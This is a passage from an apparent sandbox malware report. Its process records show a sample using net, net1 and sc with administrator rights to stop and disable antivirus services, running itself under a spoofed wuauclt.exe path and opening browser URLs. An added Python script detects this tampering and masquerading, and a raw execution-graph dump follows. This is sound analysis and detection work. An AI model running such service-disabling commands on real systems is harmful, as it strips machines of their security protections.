                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:25
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:26
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\sc.exe" config RsRavMon start= disabled
                                                                          Imagebase:0x710000
                                                                          File size:61'440 bytes
                                                                          MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:27
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\net1 stop sharedaccess
                                                                          Imagebase:0x640000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:28
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\net.exe" stop RsCCenter
                                                                          Imagebase:0x700000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:29
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:30
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\net1 stop KVWSC
                                                                          Imagebase:0x640000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:31
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:32
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\sc.exe" config RsCCenter start= disabled
                                                                          Imagebase:0x710000
                                                                          File size:61'440 bytes
                                                                          MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:33
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:34
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\net.exe" stop RsRavMon
                                                                          Imagebase:0x700000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:35
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:36
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\net1 stop KVSrvXP
                                                                          Imagebase:0x640000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:37
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\net1 stop kavsvc
                                                                          Imagebase:0x640000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:38
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\net1 stop RsCCenter
                                                                          Imagebase:0x640000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:39
                                                                          Start time:11:12:16
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net1.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\net1 stop RsRavMon
                                                                          Imagebase:0x640000
                                                                          File size:139'776 bytes
                                                                          MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:40
                                                                          Start time:11:12:17
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:41
                                                                          Start time:11:12:17
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2004,i,8456847473545843836,6778845690688114268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:42
                                                                          Start time:11:12:22
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\wuauclt.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\wuauclt.exe"
                                                                          Imagebase:0x400000
                                                                          File size:55'448 bytes
                                                                          MD5 hash:4F89E3A88853265154E24969581FB45A
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:43
                                                                          Start time:11:12:25
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Internet Explorer\iexplore.exe
                                                                          Wow64 process (32bit):
                                                                          Commandline:"C:\Program Files\Internet Explorer\iexplore.exe"
                                                                          Imagebase:
                                                                          File size:834'512 bytes
                                                                          MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:45
                                                                          Start time:11:12:27
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\explorer.exe" http://www.dvdforone.com
                                                                          Imagebase:0x7ff674740000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:46
                                                                          Start time:11:12:28
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                          Imagebase:0x7ff674740000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:47
                                                                          Start time:11:12:28
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.dvdforone.com/
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:48
                                                                          Start time:11:12:29
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2028,i,12403838513569625985,14954567300867270703,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true
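
The process list above shows the behaviour that matters for triage: net.exe, net1.exe and sc.exe are invoked with elevated privileges to stop and disable security services (RsCCenter, RsRavMon, KVWSC, KVSrvXP, kavsvc), a copy of the sample is started as C:\Windows\wuauclt.exe (the genuine wuauclt.exe lives under System32), and browsers are launched with the URLs http://www.onefordvd.com/ and http://www.dvdforone.com. The script below is an added example written for this page, not part of the Joe Sandbox report or its tooling. It parses the "Key:value" record format used in the process list, then applies three rules to it: service tampering against a watchlist, a known Windows binary name started from a directory it does not normally live in, and URL extraction for network IOCs. The embedded records are excerpted from the list above with the indentation removed; the AV_SERVICES watchlist and the EXPECTED_DIRS table are the editor's assumptions for the example (the service names are taken from the commands above, and are ones commonly shipped by Rising, Kingsoft and Kaspersky products).

```python
import re
from pathlib import PureWindowsPath

# Records excerpted (and whitespace-trimmed) from the process list above,
# embedded here so the parser and rules can run offline. Fields the rules
# do not use are omitted.
SAMPLE_RECORDS = r"""
Target ID:28
Start time:11:12:15
Path:C:\Windows\SysWOW64\net.exe
Commandline:"C:\Windows\System32\net.exe" stop RsCCenter
MD5 hash:31890A7DE89936F922D44D677F681A7F

Target ID:32
Start time:11:12:15
Path:C:\Windows\SysWOW64\sc.exe
Commandline:"C:\Windows\System32\sc.exe" config RsCCenter start= disabled
MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8

Target ID:37
Start time:11:12:16
Path:C:\Windows\SysWOW64\net1.exe
Commandline:C:\Windows\system32\net1 stop kavsvc
MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1

Target ID:40
Start time:11:12:17
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4

Target ID:42
Start time:11:12:22
Path:C:\Windows\wuauclt.exe
Commandline:"C:\Windows\wuauclt.exe"
MD5 hash:4F89E3A88853265154E24969581FB45A

Target ID:45
Start time:11:12:27
Path:C:\Windows\explorer.exe
Commandline:"C:\Windows\explorer.exe" http://www.dvdforone.com
MD5 hash:662F4F92FDE3557E86D110526BB578D5
"""

# Watchlist built from the service names the sample stops in the report above
# (editor's assumption that these are security products worth alerting on).
AV_SERVICES = {"rsccenter", "rsravmon", "kvwsc", "kvsrvxp", "kavsvc"}

# Where these Windows binaries normally live. Editor's assumption for the
# example, not data from the report; extend it for your own estate.
EXPECTED_DIRS = {
    "wuauclt.exe": {r"C:\Windows\System32", r"C:\Windows\SysWOW64"},
    "explorer.exe": {r"C:\Windows"},
}

# "net stop X" / "net1 stop X", with or without .exe and a closing quote.
SERVICE_STOP = re.compile(r'\bnet1?(?:\.exe)?"?\s+stop\s+(\S+)', re.I)
# "sc config X start= disabled" (note the space after '=' that sc.exe requires).
SERVICE_DISABLE = re.compile(r'\bsc(?:\.exe)?"?\s+config\s+(\S+)\s+start=\s*disabled', re.I)
URL = re.compile(r'https?://[^\s"\']+', re.I)


def parse_records(text):
    """Split blank-line-separated 'Key:value' blocks into dicts.

    Only the first ':' separates key from value, so times ("11:12:15")
    and drive letters ("C:\\...") survive intact."""
    records = []
    for block in re.split(r'\n\s*\n', text.strip()):
        rec = {}
        for line in block.splitlines():
            line = line.strip()
            if ':' not in line:
                continue
            key, value = line.split(':', 1)
            rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def service_tampering(records):
    """Return (target_id, action, service) for stop/disable commands aimed at a watched service."""
    hits = []
    for rec in records:
        cmd = rec.get("Commandline", "")
        for action, rx in (("stop", SERVICE_STOP), ("disable", SERVICE_DISABLE)):
            m = rx.search(cmd)
            if m and m.group(1).lower() in AV_SERVICES:
                hits.append((rec.get("Target ID"), action, m.group(1)))
    return hits


def masquerading(records):
    """Flag a known Windows binary name started from a directory it does not live in.

    PureWindowsPath compares case-insensitively, so C:\\WINDOWS and c:\\windows match."""
    hits = []
    for rec in records:
        path = PureWindowsPath(rec.get("Path", ""))
        expected = EXPECTED_DIRS.get(path.name.lower())
        if expected is None:
            continue
        if not any(path.parent == PureWindowsPath(d) for d in expected):
            hits.append((rec.get("Target ID"), str(path), rec.get("MD5 hash")))
    return hits


def urls(records):
    """Collect URLs passed on the command line (here, handed to browsers) as network IOCs."""
    found = set()
    for rec in records:
        found.update(URL.findall(rec.get("Commandline", "")))
    return sorted(found)


def analyze(text=SAMPLE_RECORDS):
    recs = parse_records(text)
    return {
        "service_tampering": service_tampering(recs),
        "masquerading": masquerading(recs),
        "urls": urls(recs),
    }


if __name__ == "__main__":
    for key, value in analyze().items():
        print(key)
        for item in value:
            print("   ", item)
```

The masquerading rule deliberately keys on the image name rather than on the hash, because a dropped copy can be repacked; in a real deployment the MD5 of the flagged process (4F89E3A88853265154E24969581FB45A for Target ID 42 above) is what you then pivot on in EDR or proxy logs. The same parser works on the full list once the leading whitespace of each line is stripped, which parse_records already does.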


                                                                            Execution Graph

                                                                            Execution Coverage:26.9%
                                                                            Dynamic/Decrypted Code Coverage:6.1%
                                                                            Signature Coverage:7.6%
                                                                            Total number of Nodes:1891
                                                                            Total number of Limit Nodes:37
                                                                            [Execution graph omitted: the interactive graph is rendered on this page as a flat list of node IDs and edges. Windows API calls named in the graph nodes: VirtualAlloc, VirtualFree, VirtualProtect, LoadLibraryA, CreateMutexA, FindCloseChangeNotification, CreateThread, Sleep, CreateProcessA, PostThreadMessageA, CreateToolhelp32Snapshot, Process32First, Process32Next, GetVersionExA, FindWindowA, FindWindowExA, GetWindowTextA, SendMessageA, GetDriveTypeA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, SetFileAttributesA, DeleteFileA, GetModuleFileNameA, CopyFileA, LocalAlloc, TlsSetValue, TlsGetValue.]
7414->7415 7416 4039d0 17 API calls 7415->7416 7417 405225 7416->7417 7418 4039d0 17 API calls 7417->7418 7419 40522f 7418->7419 7420 4039d0 17 API calls 7419->7420 7421 405239 7420->7421 7422 4039d0 17 API calls 7421->7422 7423 405243 7422->7423 7424 4039d0 17 API calls 7423->7424 7425 40524d 7424->7425 7426 4039d0 17 API calls 7425->7426 7427 405257 7426->7427 7428 4039d0 17 API calls 7427->7428 7429 405261 7428->7429 7430 4039d0 17 API calls 7429->7430 7431 40526b 7430->7431 7432 4039d0 17 API calls 7431->7432 7433 405275 7432->7433 7434 4039d0 17 API calls 7433->7434 7435 40527f 7434->7435 7436 4039d0 17 API calls 7435->7436 7437 405289 7436->7437 7438 4039d0 17 API calls 7437->7438 7438->7404 5549 408bd4 5550 408bdc 5549->5550 5550->5550 5605 4041b0 GetModuleHandleA 5550->5605 5553 408c45 5609 404f2c GetWindowsDirectoryA 5553->5609 5554 408c0f FindWindowA PostMessageA FindWindowA SendMessageA 5554->5553 5558 408c5f 5559 408c67 SetFileAttributesA 5558->5559 5628 403e74 5559->5628 5561 408c7c 5562 408c8d GetModuleFileNameA 5561->5562 5563 403e74 17 API calls 5562->5563 5564 408ca5 5563->5564 5565 404f2c 18 API calls 5564->5565 5566 408cad 5565->5566 5567 403b5c 17 API calls 5566->5567 5568 408cba 5567->5568 5569 408cc2 DeleteFileA 5568->5569 5570 404f2c 18 API calls 5569->5570 5571 408cd2 5570->5571 5572 403b5c 17 API calls 5571->5572 5573 408cdf 5572->5573 5574 408cf4 CopyFileA 5573->5574 5634 404a64 5574->5634 5577 404f2c 18 API calls 5578 408d15 5577->5578 5579 403b5c 17 API calls 5578->5579 5580 408d22 5579->5580 5581 404a64 18 API calls 5580->5581 5582 408d2d 5581->5582 5583 408d38 5582->5583 5584 408d79 5582->5584 5640 404d98 5583->5640 5585 404d98 18 API calls 5584->5585 5587 408d7e 5585->5587 5589 406928 26 API calls 5587->5589 5591 408d83 5589->5591 5736 4049cc GetVersionExA 5591->5736 5594 404f2c 18 API calls 5596 408d50 5594->5596 5598 403b5c 17 API calls 5596->5598 5600 408d5d 5598->5600 5599 408d77 5751 4039f4 5599->5751 5601 408d65 ShellExecuteA 
5600->5601 5730 407d8c 5601->5730 5606 4041e3 5605->5606 5755 403788 5606->5755 5610 403b3c 17 API calls 5609->5610 5611 404f52 5610->5611 5612 404f6e 5611->5612 5613 403b5c 17 API calls 5611->5613 5614 403b5c 5612->5614 5613->5612 5615 403b60 5614->5615 5616 403b9f 5614->5616 5617 403b6a 5615->5617 5622 403a24 5615->5622 5616->5558 5618 403b94 5617->5618 5619 403b7d 5617->5619 5623 403e74 17 API calls 5618->5623 5621 403e74 17 API calls 5619->5621 5620 403a66 5620->5558 5627 403b82 5621->5627 5624 403a94 17 API calls 5622->5624 5625 403a38 5622->5625 5623->5627 5624->5625 5625->5620 5626 40248c 17 API calls 5625->5626 5626->5620 5627->5558 5630 403e81 5628->5630 5633 403eb1 5628->5633 5629 4039d0 17 API calls 5631 403e8d 5629->5631 5630->5631 5632 403a94 17 API calls 5630->5632 5631->5561 5632->5633 5633->5629 5635 404a72 5634->5635 6832 403ac0 5635->6832 5638 404a93 5638->5577 5639 404a8a CharUpperBuffA 5639->5638 5641 403e74 17 API calls 5640->5641 5642 404da7 5641->5642 5643 404db6 GetModuleFileNameA 5642->5643 5644 403e74 17 API calls 5643->5644 5645 404dce 5644->5645 5646 406928 5645->5646 5647 406930 5646->5647 6837 402f90 5647->6837 5650 402560 4 API calls 5651 40697c 5650->5651 6841 402c3c 5651->6841 5654 402560 4 API calls 5655 40698c 5654->5655 6849 402fac 5655->6849 5657 40699c 5658 402560 4 API calls 5657->5658 5659 4069a1 5658->5659 6856 402b88 5659->6856 5662 402560 4 API calls 5663 4069ba 5662->5663 5664 402c3c 6 API calls 5663->5664 5665 4069d8 5664->5665 5666 402560 4 API calls 5665->5666 5667 4069dd 5666->5667 5668 402fac 6 API calls 5667->5668 5669 4069ef 5668->5669 5670 402560 4 API calls 5669->5670 5671 4069f4 5670->5671 5672 402b88 6 API calls 5671->5672 5673 406a1b 5672->5673 5674 402560 4 API calls 5673->5674 5675 406a20 5674->5675 5676 403ac0 17 API calls 5675->5676 5677 406a36 5676->5677 6859 404d48 5677->6859 5682 404dd0 17 API calls 5683 406a6a 5682->5683 5684 403a24 17 API calls 5683->5684 5685 406a7a 5684->5685 5686 403da4 17 API 
calls 5685->5686 5687 406a95 5686->5687 5688 404dd0 17 API calls 5687->5688 5689 406aa6 5688->5689 5690 403a24 17 API calls 5689->5690 5691 406ab6 5690->5691 5692 403da4 17 API calls 5691->5692 5693 406ad3 5692->5693 5694 404dd0 17 API calls 5693->5694 5695 406ae4 5694->5695 5696 403a24 17 API calls 5695->5696 5697 406af4 5696->5697 5698 403da4 17 API calls 5697->5698 5699 406b11 5698->5699 5700 404dd0 17 API calls 5699->5700 5701 406b22 5700->5701 5702 403a24 17 API calls 5701->5702 5703 406b32 5702->5703 5704 403da4 17 API calls 5703->5704 5705 406b4f 5704->5705 5706 404dd0 17 API calls 5705->5706 5707 406b60 5706->5707 5708 403a24 17 API calls 5707->5708 5709 406b70 5708->5709 5710 403da4 17 API calls 5709->5710 5711 406b8d 5710->5711 5712 404dd0 17 API calls 5711->5712 5713 406b9e 5712->5713 5714 403a24 17 API calls 5713->5714 5715 406bae 5714->5715 5716 403da4 17 API calls 5715->5716 5717 406bcb 5716->5717 5718 404dd0 17 API calls 5717->5718 5719 406bdc 5718->5719 5720 403a24 17 API calls 5719->5720 5721 406bec 5720->5721 5722 402ba8 4 API calls 5721->5722 5723 406bf7 5722->5723 5724 402560 4 API calls 5723->5724 5725 406bfc 5724->5725 5726 4039f4 17 API calls 5725->5726 5727 406c19 5726->5727 5728 4039d0 17 API calls 5727->5728 5729 406c21 5728->5729 5729->5594 5731 407d9d 5730->5731 5732 407da5 5731->5732 5733 407d9f 5731->5733 5732->5599 6898 4050dc GetEnvironmentVariableA 5733->6898 5737 404a32 5736->5737 5738 4049e9 5736->5738 5742 408a20 LoadIconA LoadCursorA RegisterClassA 5737->5742 5738->5737 5739 4049f0 LoadLibraryA 5738->5739 5739->5737 5740 404a08 GetProcAddress 5739->5740 5741 404a27 FreeLibrary 5740->5741 5741->5737 5743 408b10 5742->5743 5744 408a88 5742->5744 5743->5599 6934 404414 CreateWindowExA 5744->6934 5746 408aae 5746->5743 5747 408abc SetTimer 5746->5747 5748 408aeb GetMessageA 5747->5748 5749 408afb KillTimer 5748->5749 5750 408adf TranslateMessage DispatchMessageA 5748->5750 5749->5743 5750->5748 5753 4039fa 5751->5753 5752 403a20 
5753->5752 5754 40248c 17 API calls 5753->5754 5754->5753 5756 4037bb 5755->5756 5759 403728 5756->5759 5760 403764 FindWindowA 5759->5760 5761 403737 5759->5761 5760->5553 5760->5554 5761->5760 5765 408550 5761->5765 5840 40854e 5761->5840 5915 408494 InternetGetConnectedState 5761->5915 5766 408558 5765->5766 5766->5766 5767 4087e5 5766->5767 5921 406f74 GetDesktopWindow 5766->5921 5769 4039f4 17 API calls 5767->5769 5772 4087ff 5769->5772 5772->5761 5775 40859b 5776 404dd0 17 API calls 5775->5776 5777 4085b1 5776->5777 5990 404c18 5777->5990 5782 404f2c 18 API calls 5783 4085db 5782->5783 5784 403b5c 17 API calls 5783->5784 5785 4085e8 5784->5785 6006 404af8 5785->6006 5788 404f2c 18 API calls 5789 40860f 5788->5789 5790 403b5c 17 API calls 5789->5790 5791 40861c 5790->5791 5792 408624 DeleteFileA 5791->5792 6015 4042ac CreateMutexA 5792->6015 5794 408638 6016 4042ac CreateMutexA 5794->6016 5796 408646 6017 4042ac CreateMutexA 5796->6017 5798 408654 5799 404f2c 18 API calls 5798->5799 5800 40865c 5799->5800 5801 404dd0 17 API calls 5800->5801 5802 40866d 5801->5802 5803 403b5c 17 API calls 5802->5803 5804 408676 5803->5804 5805 40867e DeleteFileA 5804->5805 6018 4042ac CreateMutexA 5805->6018 5807 408692 5808 404dd0 17 API calls 5807->5808 5809 40869f 5808->5809 6019 404854 5809->6019 5812 404dd0 17 API calls 5813 4086b4 5812->5813 5814 404854 39 API calls 5813->5814 5815 4086bc 5814->5815 6035 404b70 5815->6035 5818 404b70 20 API calls 5819 4086e4 5818->5819 5820 404b70 20 API calls 5819->5820 5821 4086f8 5820->5821 5822 404b70 20 API calls 5821->5822 5823 40870c 5822->5823 5824 404b70 20 API calls 5823->5824 5825 408720 5824->5825 5826 404dd0 17 API calls 5825->5826 5827 40872d 5826->5827 5828 404b70 20 API calls 5827->5828 5829 40873f 5828->5829 5830 404dd0 17 API calls 5829->5830 5831 40874c 5830->5831 5832 404b70 20 API calls 5831->5832 5833 40875e 5832->5833 5834 404d98 18 API calls 5833->5834 5835 408763 5834->5835 5836 406928 26 API calls 5835->5836 5837 
408768 5836->5837 5838 408494 36 API calls 5837->5838 5839 40876d CreateThread CreateThread CreateThread CreateThread CreateThread 5838->5839 5839->5767 6142 407dd0 Sleep 5839->6142 6163 407f54 Sleep 5839->6163 6180 4084b8 Sleep 5839->6180 6183 407bec 5839->6183 6215 4072ac 5839->6215 5842 408550 5840->5842 5841 4087e5 5844 4039f4 17 API calls 5841->5844 5842->5841 5843 406f74 50 API calls 5842->5843 5845 408580 5843->5845 5847 4087ff 5844->5847 5846 4039d0 17 API calls 5845->5846 5848 40858a 5846->5848 5847->5761 5849 404dd0 17 API calls 5848->5849 5850 40859b 5849->5850 5851 404dd0 17 API calls 5850->5851 5852 4085b1 5851->5852 5853 404c18 21 API calls 5852->5853 5854 4085c6 5853->5854 5855 403a24 17 API calls 5854->5855 5856 4085d3 5855->5856 5857 404f2c 18 API calls 5856->5857 5858 4085db 5857->5858 5859 403b5c 17 API calls 5858->5859 5860 4085e8 5859->5860 5861 404af8 20 API calls 5860->5861 5862 408607 5861->5862 5863 404f2c 18 API calls 5862->5863 5864 40860f 5863->5864 5865 403b5c 17 API calls 5864->5865 5866 40861c 5865->5866 5867 408624 DeleteFileA 5866->5867 6752 4042ac CreateMutexA 5867->6752 5869 408638 6753 4042ac CreateMutexA 5869->6753 5871 408646 6754 4042ac CreateMutexA 5871->6754 5873 408654 5874 404f2c 18 API calls 5873->5874 5875 40865c 5874->5875 5876 404dd0 17 API calls 5875->5876 5877 40866d 5876->5877 5878 403b5c 17 API calls 5877->5878 5879 408676 5878->5879 5880 40867e DeleteFileA 5879->5880 6755 4042ac CreateMutexA 5880->6755 5882 408692 5883 404dd0 17 API calls 5882->5883 5884 40869f 5883->5884 5885 404854 39 API calls 5884->5885 5886 4086a7 5885->5886 5887 404dd0 17 API calls 5886->5887 5888 4086b4 5887->5888 5889 404854 39 API calls 5888->5889 5890 4086bc 5889->5890 5891 404b70 20 API calls 5890->5891 5892 4086d0 5891->5892 5893 404b70 20 API calls 5892->5893 5894 4086e4 5893->5894 5895 404b70 20 API calls 5894->5895 5896 